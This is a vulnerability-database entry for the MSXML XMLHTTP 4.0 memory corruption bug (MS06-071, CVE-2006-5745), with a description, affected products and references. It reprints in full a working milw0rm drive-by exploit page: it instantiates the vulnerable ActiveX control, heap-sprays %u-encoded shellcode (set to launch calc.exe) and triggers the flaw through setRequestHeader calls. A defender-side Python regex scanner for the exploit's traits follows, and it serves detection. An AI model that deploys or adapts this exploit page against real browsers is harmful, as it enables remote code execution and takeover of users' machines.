Microsoft XML Core Services XMLHTTP Control Memory Corruption Vulnerability (MS06-071)

Vulnerability ID: 1111493
Vulnerability type: Boundary condition error
Published: 2006-11-08
Updated: 2007-05-15
CVE: CVE-2006-5745
CNNVD ID: CNNVD-200611-068
Platform: Windows
CVSS score: 7.6
|Vulnerability sources
https://www.exploit-db.com/exploits/2743
https://www.securityfocus.com/bid/20915
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-068
|Vulnerability details
Microsoft XML Core Services (MSXML) lets users of JScript, VBScript and Microsoft Visual Studio 6.0 build XML applications that interoperate with other applications conforming to the XML 1.0 standard. In the XMLHTTP 4.0 ActiveX control of Microsoft XML Core Services, the setRequestHeader() function does not handle HTTP requests correctly, so an attacker who lures a user to a malicious site can cause arbitrary instructions to be executed. An attacker could exploit the vulnerability by constructing a specially crafted web page; if a user visits that page or clicks a link in an e-mail, the vulnerability could allow remote code execution, and an attacker who succeeded could take complete control of the affected system. Exploitation does, however, require user interaction.
|Exploit (EXP)
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers, calc.exe is called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body onload="exploit()">
<object id="target" classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}">
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {}

var sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");

var sz = sh.length * 2;
var npsz = 0x400000-(sz+0x38);
var nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
var ihbc = (0x12000000-0x400000)/0x400000;
var mm = new Array();
for (var i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
</body></html>

# milw0rm.com [2006-11-08]
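As an added, defender-side example that is not part of the milw0rm entry above: a small Python content scanner that flags HTML matching the structural traits visible in the exploit (an <object> instantiating the XMLHTTP 4.0 CLSID from the page, setRequestHeader() called with a non-string first argument, a long %u-escaped payload blob, and a length-doubling spray loop). The two HTML samples are constructed for this example, and the rule names and the "two or more hits including the CLSID" threshold are the example's own choices, not anything from the advisory.

```python
import re

# CLSID of the XMLHTTP 4.0 ActiveX control, taken from the <object classid=...>
# tag in the exploit on this page.
XMLHTTP40_CLSID = "88d969c5-f192-11d4-a65f-0040963251e5"

# Constructed sample inputs (not captured traffic): one page that mirrors the
# structure of the exploit above, and one benign page using XMLHttpRequest.
SUSPICIOUS_HTML = """
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}"></object>
<script>
var sh = unescape("%u9090%u9090%uE8FC%u0044");
var nps = unescape("%u0D0D%u0D0D");
while (nps.length*2 < 0x3fffc8) nps += nps;
obj.setRequestHeader(new Object(), 0x12345678);
</script>
"""

BENIGN_HTML = """
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/status");
xhr.setRequestHeader("Accept", "application/json");
xhr.send();
</script>
"""

# Detection rules: (rule name, compiled regex). Matching is case-insensitive
# and tolerates the whitespace variations an obfuscated copy might introduce.
RULES = [
    # <object classid="CLSID:{...}"> for the vulnerable control
    ("xmlhttp40_activex_object",
     re.compile(r"classid\s*=\s*[\"']?\s*CLSID:\{?" + XMLHTTP40_CLSID + r"\}?", re.I)),
    # setRequestHeader() whose header-name argument is an object, not a string
    ("setrequestheader_non_string_arg",
     re.compile(r"\.setRequestHeader\s*\(\s*new\s+(Object|Array)\s*\(", re.I)),
    # unescape() fed a run of at least four %uXXXX escapes (shellcode-style blob)
    ("unicode_escaped_blob",
     re.compile(r"unescape\s*\(\s*[\"'](?:%u[0-9a-f]{4}){4,}", re.I)),
    # while (x.length ... ) x += x; the classic string-doubling spray loop
    ("heap_spray_doubling_loop",
     re.compile(r"while\s*\([^)]*\.length[^)]*\)\s*\w+\s*\+=\s*\w+", re.I)),
]


def scan_html(html: str) -> list[str]:
    """Return the names of every rule that fires on the given HTML text."""
    return [name for name, rx in RULES if rx.search(html)]


def classify(html: str) -> str:
    """Collapse rule hits into a verdict: clean / suspicious / likely-exploit."""
    hits = scan_html(html)
    # The CLSID alone is not proof (legitimate pages may use MSXML); require a
    # second exploit trait before escalating to likely-exploit.
    if "xmlhttp40_activex_object" in hits and len(hits) >= 2:
        return "likely-exploit"
    if hits:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    for label, doc in (("sample", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(label, classify(doc), scan_html(doc))
```

The regexes are deliberately structural rather than byte-exact, so a copy with changed shellcode or a different spray width still fires; on a proxy or mail gateway, feed the response or attachment body to classify() and treat "likely-exploit" as a block, "suspicious" as a review queue.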
|Affected products
Microsoft XML Core Services 6.0
Microsoft XML Core Services 4.0
HP Storage Management Appliance 2.1
HP Storage Management Appliance III
|References

Source: VU#585137, Name: VU#585137, Link: http://www.kb.cert.org/vuls/id/585137
Source: TA06-318A, Name: TA06-318A, Link: http://www.us-cert.gov/cas/techalerts/TA06-318A.html
Source: XF, Name: ie-xml-http-request-handling(30004), Link: http://xforce.iss.net/xforce/xfdb/30004
Source: MISC, Link: http://xforce.iss.net/xforce/alerts/id/239
Source: BID, Name: 20915, Link: http://www.securityfocus.com/bid/20915
Source: MILW0RM, Name: 2743, Link: http://www.milw0rm.com/exploits/2743
Source: www.microsoft.com, Link: http://www.microsoft.com/technet/security/advisory/927892.mspx
Source: ISS, Name: 20061104 Vulnerability in Microsoft XMLHTTP Request Handling, Link: http://www.iss.net/threats/239.html
Source: VUPEN, Name: ADV-2006-4334, Link: http://www.frsirt.com/english/advisories/2006/4334
Source: SECTRACK, Name: 1017157, Link: http://securitytracker.com/id?1017157
Source: SECUNIA, Name: 22687, Link: http://secunia.com/advisories/22687
Source: MISC, Link: http://blogs.securiteam.com/?p=717
Source: MS, Name: MS06-071, Link: http://www.microsoft.com/technet/security/bulletin/ms06-071.mspx
Source: oval:org.mitre.oval:def:104, Name: oval:org.mitre.oval:def:104, Link: